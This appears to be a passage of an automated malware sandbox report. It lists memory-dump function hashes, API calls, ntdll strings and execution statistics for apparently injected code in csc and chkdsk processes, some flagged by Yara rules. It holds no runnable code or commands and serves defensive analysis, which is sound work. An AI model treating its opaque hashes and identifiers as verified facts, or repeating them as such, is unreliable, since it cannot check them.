                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b028d78f93cb56848cfe6d0540e31bb3e93e5e961cf793ab917f3a8a996b99e9
                                                      • Instruction ID: b3437a9de4dfcf40c6ed0690efe2f5c288b8b853ed8fa434a1f0fb9e7aad1d57
                                                      • Opcode Fuzzy Hash: b028d78f93cb56848cfe6d0540e31bb3e93e5e961cf793ab917f3a8a996b99e9
                                                      • Instruction Fuzzy Hash: 20900266601500424944715C4844406A015D7E23013D5C115A1594560C8718C9659379
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6336c84dd70108a73e13b972f100ab7b99b4bda9d5736c0f211207d642c93d9e
                                                      • Instruction ID: 72de768a23345934dc9a1e1ff2b00cb3f58faeaa84a4ebd5c6da1c28f61d8bee
                                                      • Opcode Fuzzy Hash: 6336c84dd70108a73e13b972f100ab7b99b4bda9d5736c0f211207d642c93d9e
                                                      • Instruction Fuzzy Hash: 7090022620184442D944725C4844B0F8115C7E2202FD5C019A5196554CCA15C9655731
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d56f9fe96991247817c819dea87f1691b56d7c0ea0b565d8477d1e9d4e433f23
                                                      • Instruction ID: 8f06802ce5e3d445658257fe97cdf6a46bd3e64809d70e337693a49e9f059c93
                                                      • Opcode Fuzzy Hash: d56f9fe96991247817c819dea87f1691b56d7c0ea0b565d8477d1e9d4e433f23
                                                      • Instruction Fuzzy Hash: 6A90022624140802D944715C84547074016C7D1601F95C011A1064554D8716CA7567B1
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8bd75952190338d187917c8e04432922b114d6676c407acb29b5c023faf7429c
                                                      • Instruction ID: 527ef411f2cee4d5823be4570737a38c7fa2dad1059ba9ef34beca6f2cece2a5
                                                      • Opcode Fuzzy Hash: 8bd75952190338d187917c8e04432922b114d6676c407acb29b5c023faf7429c
                                                      • Instruction Fuzzy Hash: BE900236605800129944715C48C45468015D7E1301B95C011E1464554C8B14CA665371
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e09ddabb84c47c293d5f0d940dd900fa93056fb8b067dc290a36b5252fc2e02
                                                      • Instruction ID: 2a8dc5c01f75969f47a9321cc2b81571668198b3de3aa8f31613646d33373414
                                                      • Opcode Fuzzy Hash: 9e09ddabb84c47c293d5f0d940dd900fa93056fb8b067dc290a36b5252fc2e02
                                                      • Instruction Fuzzy Hash: D190022630140003D944715C54586068015D7E2301F95D011E1454554CDA15C9665332
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db97f33a6ecc05577b1b5990b5f339fbbb686e7ce01bce069c89f1d5f9d6c7a3
                                                      • Instruction ID: 4a925fe930df996762956e75d58c9f0e84f6a6654d2c30dc39d5f3469a8981bf
                                                      • Opcode Fuzzy Hash: db97f33a6ecc05577b1b5990b5f339fbbb686e7ce01bce069c89f1d5f9d6c7a3
                                                      • Instruction Fuzzy Hash: 1090022E21340002D984715C544860A4015C7D2202FD5D415A1055558CCA15C9795331
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6fad92e994810e0a40fc952dca9c43f8bfcbab7217e8f19d2d2e8f88c8b01310
                                                      • Instruction ID: a6c56a5d0c528df4b5b7d4f2a622090f2d8db086a443e484fc1f8292c7150638
                                                      • Opcode Fuzzy Hash: 6fad92e994810e0a40fc952dca9c43f8bfcbab7217e8f19d2d2e8f88c8b01310
                                                      • Instruction Fuzzy Hash: 94900236202401429D44725C5844A4E8115C7E2302BD5D415A1055554CCA14C9715331
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1cf21ff3df21571fddb20ea6de95d434a918dbf2dcec37665291cf7e42372374
                                                      • Instruction ID: d5431a60281ee1b26e33211622ceefd387cbc6e16cae887029100d317af7329f
                                                      • Opcode Fuzzy Hash: 1cf21ff3df21571fddb20ea6de95d434a918dbf2dcec37665291cf7e42372374
                                                      • Instruction Fuzzy Hash: 8190022620544442D904755C5448A064015C7D1205F95D011A20A4595DC735C961A231
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fa988e9b4f380077839789a8ea0ab92ce18fd585eb15e5d49a0b5738605ca1c3
                                                      • Instruction ID: ab533377b0d14a33a9592733961321a9889b345622569b2c1cad723906fab5be
                                                      • Opcode Fuzzy Hash: fa988e9b4f380077839789a8ea0ab92ce18fd585eb15e5d49a0b5738605ca1c3
                                                      • Instruction Fuzzy Hash: 6C90023A20140402DD14715C58446464056C7D1301F95D411A1464558D8754C9B1A231
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db01f0640cc2090ce1a53c74724b0c2041c6b02be3bbf449d5da5ad1aa89a7ff
                                                      • Instruction ID: ba5eb16799cf7e6567d6aaf96630ff4ce4158d6b1c28cb846a2e51fb4e236cfe
                                                      • Opcode Fuzzy Hash: db01f0640cc2090ce1a53c74724b0c2041c6b02be3bbf449d5da5ad1aa89a7ff
                                                      • Instruction Fuzzy Hash: 3890023624140402D945715C44446064019D7D1241FD5C012A1464554E8755CB66AB71
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e715388f01ec9a3824f3c37646a47a04f9de9e6956921f95cd254cbb365aa76
                                                      • Instruction ID: 48dab7a870f440a1c192e4929f10231bb487c4948e38cf48716a3d728c04792f
                                                      • Opcode Fuzzy Hash: 0e715388f01ec9a3824f3c37646a47a04f9de9e6956921f95cd254cbb365aa76
                                                      • Instruction Fuzzy Hash: EA900226242441525D49B15C44445078016D7E12417D5C012A2454950C8626D966D731
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5422f2c050d8591601e80ecd25741174f3b7618202a661192ba85e3e94255c72
                                                      • Instruction ID: d8d15de73f26c45c2d327bda88771c2077de4d9cd1d8d938448fe13119c75820
                                                      • Opcode Fuzzy Hash: 5422f2c050d8591601e80ecd25741174f3b7618202a661192ba85e3e94255c72
                                                      • Instruction Fuzzy Hash: FD90023620140842D904715C4444B464015C7E1301F95C016A1164654D8715C9617631
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 8a157bc15f7570eeebec3297968f83660c277d1604d8bc47eba3922cc4c7def6
                                                      • Instruction ID: bdf2aa70d5a45b149cb654e94fb0985b7bb6c9c68cb47e4c7364cc5b531ead43
                                                      • Opcode Fuzzy Hash: 8a157bc15f7570eeebec3297968f83660c277d1604d8bc47eba3922cc4c7def6
                                                      • Instruction Fuzzy Hash: 9B51B6BAA0412ABFCB25DB99889097FF7FDBB08200754816AF469D7681D374DE50C7E0
                                                      Strings
                                                      • ExecuteOptions, xrefs: 054146A0
                                                      • Execute=1, xrefs: 05414713
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05414742
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 05414787
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05414725
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05414655
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 054146FC
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: c80bd21dce7f38996a9ea8b41a41262d859b267f7e41560d95cbf98e6ac469b3
                                                      • Instruction ID: 2e4aadf103c1d9db9c88c2a67c203f6cc8cf0ad0f3e89212fc613e8acda40769
                                                      • Opcode Fuzzy Hash: c80bd21dce7f38996a9ea8b41a41262d859b267f7e41560d95cbf98e6ac469b3
                                                      • Instruction Fuzzy Hash: 5B51F7327002297ADF14EAA5EC8AFFAB7B9FF04700F5404A9E505A71D0EB719A45CF64
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: f3ef2df452cb2a642701b64e1528806a0682a037d161e086f2e8553d121b8262
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 0D81A170E092699ADF27CE68C8617FEFBE6BF45350F18415AD891A77D0C7749840CB50
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05417B7F
                                                      • RTL: Re-Waiting, xrefs: 05417BAC
                                                      • RTL: Resource at %p, xrefs: 05417B8E
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: 36e61f33aaeca547e4c4845eac31d97f4257b82cb3701ae62f0d8535eca1447b
                                                      • Instruction ID: 5b3ff2ef251cfcab1ae7f8954a6b4bdc230876096f983c88d932378fdf6d86d5
                                                      • Opcode Fuzzy Hash: 36e61f33aaeca547e4c4845eac31d97f4257b82cb3701ae62f0d8535eca1447b
                                                      • Instruction Fuzzy Hash: 0641F2327047029BC724DE25E951B6BF7EAFF88710F100A1EF95697680DB71E4058FA5
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0541728C
                                                      Strings
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05417294
                                                      • RTL: Re-Waiting, xrefs: 054172C1
                                                      • RTL: Resource at %p, xrefs: 054172A3
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: a43b4ceeab19524ba7005358665965f9d87baa31144f3cecdb25bc35fe35b90b
                                                      • Instruction ID: 40dae1493011d7136d9ca48fe208ade1ff9343067135de3af973994204b59eee
                                                      • Opcode Fuzzy Hash: a43b4ceeab19524ba7005358665965f9d87baa31144f3cecdb25bc35fe35b90b
                                                      • Instruction Fuzzy Hash: 2F41EF32704216ABC725DE25DC41FA6F7B6FB44710F20061AFD55AB680DB31E8168BE5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 1c71256210f1bb6d7b33d5ad4fb87f27a24b8c466d21dc1d5d0a192f815eca0f
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: FE919670E042B69BDF28DF69C885ABEB7E6FF84720F14451AE855E72C0E7709D428760
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: d83ed274d1494b2bf0c89fcdec0ab237ca9547356a059ee67e76e97980264cd8
                                                      • Instruction ID: 51db5a04beacb3ee6ab203008dde2597341fb10c876a003f95d75c70a490c9cf
                                                      • Opcode Fuzzy Hash: d83ed274d1494b2bf0c89fcdec0ab237ca9547356a059ee67e76e97980264cd8
                                                      • Instruction Fuzzy Hash: 6C813D76D042699BDB25DB54CC49BEEB7B4BF08710F1045EAE909B7280D7709E84CFA0
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0542CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4_w@4_w
                                                      • API String ID: 4062629308-713214301
                                                      • Opcode ID: 3830f0f4d8c032bf6829b237be2c63ab27ef2bffe9f1acd4ccc338fb6c4a78ab
                                                      • Instruction ID: 4305278156108f9ce9f635c8be7a95be0d2210eb8e3280740ebbbdb9b9700f76
                                                      • Opcode Fuzzy Hash: 3830f0f4d8c032bf6829b237be2c63ab27ef2bffe9f1acd4ccc338fb6c4a78ab
                                                      • Instruction Fuzzy Hash: 0141AB71E002249ECB21DFA9C885AEEBBB8FF45B04F51446BE905DB264D7709802DB61

                                                      Execution Graph

Execution Coverage: 3.2%
Dynamic/Decrypted Code Coverage: 4.1%
Signature Coverage: 0.7%
Total number of Nodes: 461
Total number of Limit Nodes: 74
[Execution graph: rendered node/edge diagram, not recoverable in text. API calls appearing as graph nodes: PostThreadMessageW, LdrLoadDll, GetFileAttributesW, RtlAllocateHeap, RtlFreeHeap, CreateProcessInternalW, LdrInitializeThunk, NtClose, NtAllocateVirtualMemory, SetErrorMode, CoInitialize, Sleep, CreateThread, NtCreateFile, NtDeleteFile, NtReadFile, FindFirstFileW, FindNextFileW, FindClose]

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
[Control-flow graph of the function at 759320 (basic blocks 759320-759bca): rendered block/edge diagram, not recoverable in text. One call edge, to 779290 at 759b56.]
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "t$#$#$%$'$'D$*$.$.z$0'$7M$8$;3$< $<f$A$C"$F*$FW$Hp$K$[;$_R$nA$o$y,${"$~$ $/$h
                                                      • API String ID: 0-507472186
                                                      • Opcode ID: 76f8a13f1fe5939c06321efb992b1ae172bb199c40fd381e978a5e9125fb4b58
                                                      • Instruction ID: 86357d6375ff1f8f95e4761bfec784b3cc1659a69dd621c0ce24658250678744
                                                      • Opcode Fuzzy Hash: 76f8a13f1fe5939c06321efb992b1ae172bb199c40fd381e978a5e9125fb4b58
                                                      • Instruction Fuzzy Hash: 6B329CB0D05269CBEB24CF45C898BDDBBB1BB85309F2085D9C50D6B281C7B96AC9CF54
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0076B6A4
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0076B6DF
                                                      • FindClose.KERNELBASE(?), ref: 0076B6EA
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 16a20ad5e6b8ceb47d88f4660dc3fbc92ce7833b86e08af8b03ac43903ca680d
                                                      • Instruction ID: 82fffcbdc292ea02788a9a1727dfcb15b4aae6fe841e4c8e68ac5f1d834dad9e
                                                      • Opcode Fuzzy Hash: 16a20ad5e6b8ceb47d88f4660dc3fbc92ce7833b86e08af8b03ac43903ca680d
                                                      • Instruction Fuzzy Hash: F0318371940348BBDB20DBA0CC89FFB777C9B44745F148559B909A7181DB74AA858BA0
                                                      APIs
                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 0077753D
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 477f58a97ef932f71a1279cccd95bb228a367dd78ec40fe8a4dca4813d9a0388
                                                      • Instruction ID: d96c33ff3903c151dd99b395cbafbfd782f03865b8461e2e5f2fc700323210b6
                                                      • Opcode Fuzzy Hash: 477f58a97ef932f71a1279cccd95bb228a367dd78ec40fe8a4dca4813d9a0388
                                                      • Instruction Fuzzy Hash: 6531CFB5A00208AFDB04DF98D885EEFB7F9AF8C714F108219FD19A3240D774A951CBA5
                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00777685
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 0493dabfe859718ff47aceda00552a6b7c9f430b4426196da1b76d7fd195e02b
                                                      • Instruction ID: 5af350875ffbeb571789e068fb66afd0271f97c45bd32d1da3434d4890e07479
                                                      • Opcode Fuzzy Hash: 0493dabfe859718ff47aceda00552a6b7c9f430b4426196da1b76d7fd195e02b
                                                      • Instruction Fuzzy Hash: DB310AB5A00609AFDB14DF98D841EEF77B9EF8C314F108609FD18A7240D774A8118BA5
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(0076118B,?,?,00000000,00000004,00003000,?,?,?,?,?,?,0076118B,0076FF61,?,00000000), ref: 00777937
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: f359f5d82faebaccd4494c43b8bee9817ba5ff76922e437d83e4df8c04e1250b
                                                      • Instruction ID: 10bf02b55e377593a9418066acb3517363c675ef5684ab390806b5cbbbce782d
                                                      • Opcode Fuzzy Hash: f359f5d82faebaccd4494c43b8bee9817ba5ff76922e437d83e4df8c04e1250b
                                                      • Instruction Fuzzy Hash: 8D2105B5A00648AFDB14EF98DC45FEFB7A9EF88711F008509FD18A7241D774A810CBA5
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: fef99ae8805eda17e1b638b3292ed56224c9cd73c8a113fc9df4491e960a74b9
                                                      • Instruction ID: 897b78d323b7b888df508797fc74299ecd12e1196b326a66297f4fb2863c6fb7
                                                      • Opcode Fuzzy Hash: fef99ae8805eda17e1b638b3292ed56224c9cd73c8a113fc9df4491e960a74b9
                                                      • Instruction Fuzzy Hash: DE01AD75640304BFE620EAA8DC4AFBB73ACDB85720F40850AFA19A7181DAB47910C7E1
                                                      APIs
                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00777754
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
                                                      • Instruction ID: 50ce587089b9a2bf3521d230a73601f529f3a5b1de3dc8a91f86b79a579d5543
                                                      • Opcode Fuzzy Hash: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
                                                      • Instruction Fuzzy Hash: 55E04F352002047BD610AA69CC05FD7776DDFC5761F408419FA0CA7142CA74791186F1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: deb0809ab87f03c567e8c8646f669e595dcc91a5c7791f440178ee8d5b6ef63e
                                                      • Instruction ID: 205b6398176a73b6c2c92053193d4e1301f4a37ef621dae8332dbc244655d2a5
                                                      • Opcode Fuzzy Hash: deb0809ab87f03c567e8c8646f669e595dcc91a5c7791f440178ee8d5b6ef63e
                                                      • Instruction Fuzzy Hash: 8790023260650402D20071584555746502587E4201FA5C412B0428569D87958A5175A2
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e1a8f12baa56a65ae2213b61c1e83e638e30755ef7211984f97022daad273754
                                                      • Instruction ID: 89386abb69801d322e94be1250117dd2cb954f719d254a4f29d4bc4f976bcff1
                                                      • Opcode Fuzzy Hash: e1a8f12baa56a65ae2213b61c1e83e638e30755ef7211984f97022daad273754
                                                      • Instruction Fuzzy Hash: D190026260250042424071584845446A02597F53013D5C116B0558561C87188955A269
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b0fca23c7104fc5b5408622aef187beebaf883995ccba6999cde73ddbaa13cb7
                                                      • Instruction ID: 343fa918d00d3703298fdab9cee02707aa1b1dfa85f3c8563122f9ca99ea9805
                                                      • Opcode Fuzzy Hash: b0fca23c7104fc5b5408622aef187beebaf883995ccba6999cde73ddbaa13cb7
